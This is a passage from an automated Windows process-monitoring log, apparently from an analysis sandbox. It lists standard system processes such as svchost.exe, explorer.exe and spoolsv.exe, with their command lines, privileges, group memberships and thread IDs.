os_tid = 0x358 Thread: id = 587 os_tid = 0x360 Thread: id = 590 os_tid = 0x36c Thread: id = 602 os_tid = 0x3a0 Thread: id = 604 os_tid = 0x3a8 Thread: id = 608 os_tid = 0x3bc Thread: id = 609 os_tid = 0x3c0 Thread: id = 610 os_tid = 0x3c4 Thread: id = 613 os_tid = 0x3d4 Thread: id = 617 os_tid = 0x3e4 Thread: id = 618 os_tid = 0x3e8 Thread: id = 648 os_tid = 0x23c Thread: id = 649 os_tid = 0x268 Thread: id = 665 os_tid = 0x12c Thread: id = 666 os_tid = 0x130 Process: id = "47" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x231ea000" os_pid = "0x340" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d11f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 580 os_tid = 0x344 Thread: id = 584 os_tid = 0x354 Thread: id = 586 os_tid = 0x35c Thread: id = 588 os_tid = 0x364 Thread: id = 589 os_tid = 0x368 Thread: id = 591 os_tid = 0x370 Thread: id = 603 os_tid = 0x3a4 Thread: id = 606 os_tid = 0x3ac Thread: id = 607 os_tid = 0x3b8 Thread: id = 612 os_tid = 0x3d0 Thread: id = 615 os_tid = 0x3dc Thread: id = 616 os_tid = 0x3e0 Thread: id = 631 os_tid = 0x110 Thread: id = 632 os_tid = 0x108 Thread: id = 640 os_tid = 0x134 Thread: id = 641 os_tid = 0x160 Thread: id = 683 os_tid = 0x430 Thread: id = 685 os_tid = 0x438 Thread: id = 686 os_tid = 0x43c Thread: id = 690 os_tid = 0x1ec Thread: id = 691 os_tid = 0x3f8 Thread: id = 700 os_tid = 0x454 Thread: id = 704 os_tid = 0x474 Thread: id = 726 os_tid = 0x4e4 Process: id = "48" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x22f22000" os_pid = "0x380" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x29c" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2cc" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9e6" [0xc000000f], "LOCAL" [0x7] Thread: id = 595 os_tid = 0x384 Thread: id = 596 os_tid = 0x388 Thread: id = 599 os_tid = 0x394 Thread: id = 600 os_tid = 0x398 Thread: id = 601 os_tid = 0x39c Process: id = "49" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x225f4000" os_pid = "0x3c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dfe5" [0xc000000f], "LOCAL" [0x7] Thread: id = 611 os_tid = 0x3cc Thread: id = 614 os_tid = 0x3d8 Thread: id = 619 os_tid = 0x3ec Thread: id = 620 os_tid = 0x3f4 Thread: id = 621 os_tid = 0x3f8 Thread: id = 626 os_tid = 0xf0 Thread: id = 630 os_tid = 0x10c Thread: id = 659 os_tid = 0x118 Process: id = "50" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1f5d4000" os_pid = "0x104" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0x228" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d11f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 633 os_tid = 0xf8 Thread: id = 634 os_tid = 0x128 Thread: id = 635 os_tid = 0x12c Thread: id = 636 os_tid = 0x130 Thread: id = 637 os_tid = 0x124 Thread: id = 638 os_tid = 0x11c Thread: id = 639 os_tid = 0x118 Process: id = "51" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x6a1c7000" os_pid = "0x14c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x174" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 642 os_tid = 0x148 Process: id = "52" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x694be000" os_pid = "0x198" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x14c" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 643 os_tid = 0x1f0 Thread: id = 645 os_tid = 0x1ac Thread: id = 646 os_tid = 0x1f4 Thread: id = 650 os_tid = 0x288 Thread: id = 651 os_tid = 0x34c Thread: id = 652 os_tid = 0x374 Thread: id = 655 os_tid = 0x3a4 Thread: id = 657 os_tid = 0xfc Thread: id = 658 os_tid = 0x23c Thread: id = 678 os_tid = 0x41c Thread: id = 687 os_tid = 0x440 Thread: id = 688 os_tid = 0x444 Thread: id = 692 os_tid = 0x448 Thread: id = 693 os_tid = 0x44c Thread: id = 694 os_tid = 0x450 Thread: id = 695 os_tid = 0x458 Thread: id = 696 os_tid = 0x45c Thread: id = 697 os_tid = 0x460 Thread: id = 698 os_tid = 0x464 Thread: id = 699 os_tid = 0x468 Thread: id = 701 os_tid = 0x46c Thread: id = 702 os_tid = 0x470 Thread: id = 703 os_tid = 0x478 Thread: id = 705 os_tid = 0x47c Thread: id = 707 os_tid = 0x48c Thread: id = 709 os_tid = 0x490 Thread: id = 713 os_tid = 0x4ac Thread: id = 715 os_tid = 0x4b8 Thread: id = 717 os_tid = 0x4c0 Thread: id = 722 os_tid = 0x4d4 Thread: id = 730 os_tid = 0x4f4 Thread: id = 741 os_tid = 0x52c Process: id = "53" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x1e73f000" os_pid = "0x2d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0x31c" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 654 os_tid = 0x334 Thread: id = 660 os_tid = 0x378 Thread: id = 661 os_tid = 0x11c Thread: id = 662 os_tid = 0x124 Thread: id = 664 os_tid = 0x128 Process: id = "54" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x19814000" os_pid = "0x104" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010c61" [0xc000000f], "LOCAL" [0x7] Thread: id = 668 os_tid = 0x124 Thread: id = 669 os_tid = 0x118 Thread: id = 671 os_tid = 0x404 Thread: id = 672 os_tid = 0x408 Thread: id = 673 os_tid = 0x40c Thread: id = 676 os_tid = 0x414 Thread: id = 679 os_tid = 0x420 Thread: id = 680 os_tid = 0x424 Thread: id = 681 os_tid = 0x428 Thread: id = 682 os_tid = 0x42c Thread: id = 684 os_tid = 0x434 Thread: id = 712 os_tid = 0x4a8 Process: id = "55" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x1711a000" os_pid = "0x494" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00014ff5" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 710 os_tid = 0x498 Thread: id = 716 os_tid = 0x4bc Thread: id = 724 os_tid = 0x4dc Thread: id = 725 os_tid = 0x4e0 Thread: id = 729 os_tid = 0x4f0 Thread: id = 734 os_tid = 0x504 Process: id = "56" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1745a000" os_pid = "0x4a0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0x228" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 711 os_tid = 0x4a4 Thread: id = 714 os_tid = 0x4b4 Thread: id = 728 os_tid = 0x4ec Thread: id = 731 os_tid = 0x4f8 Thread: id = 732 os_tid = 0x4fc Thread: id = 733 os_tid = 0x500 Thread: id = 738 os_tid = 0x51c Process: id = "57" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0x16c08000" os_pid = "0x4c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0x198" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 719 os_tid = 0x4c8 Process: id = "58" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0x16612000" os_pid = "0x4cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0x198" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 720 os_tid = 0x4d0 Thread: id = 740 os_tid = 0x524 Thread: id = 745 os_tid = 0x538 Thread: id = 754 os_tid = 0x55c Thread: id = 755 os_tid = 0x560 Process: id = "59" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x17b87000" os_pid = "0x508" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e72f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 735 os_tid = 0x50c Thread: id = 739 os_tid = 0x520 Thread: id = 743 os_tid = 0x530 Thread: id = 748 os_tid = 0x544 Thread: id = 751 os_tid = 0x550 Thread: id = 752 os_tid = 0x554 Thread: id = 756 os_tid = 0x564 Thread: id = 758 os_tid = 0x56c Process: id = "60" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1705b000" os_pid = "0x514" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x1a0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:000185c6" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 737 os_tid = 0x518 Thread: id = 742 os_tid = 0x528 Thread: id = 747 os_tid = 0x540 Thread: id = 749 os_tid = 0x548 Thread: id = 750 os_tid = 0x54c Thread: id = 757 os_tid = 0x568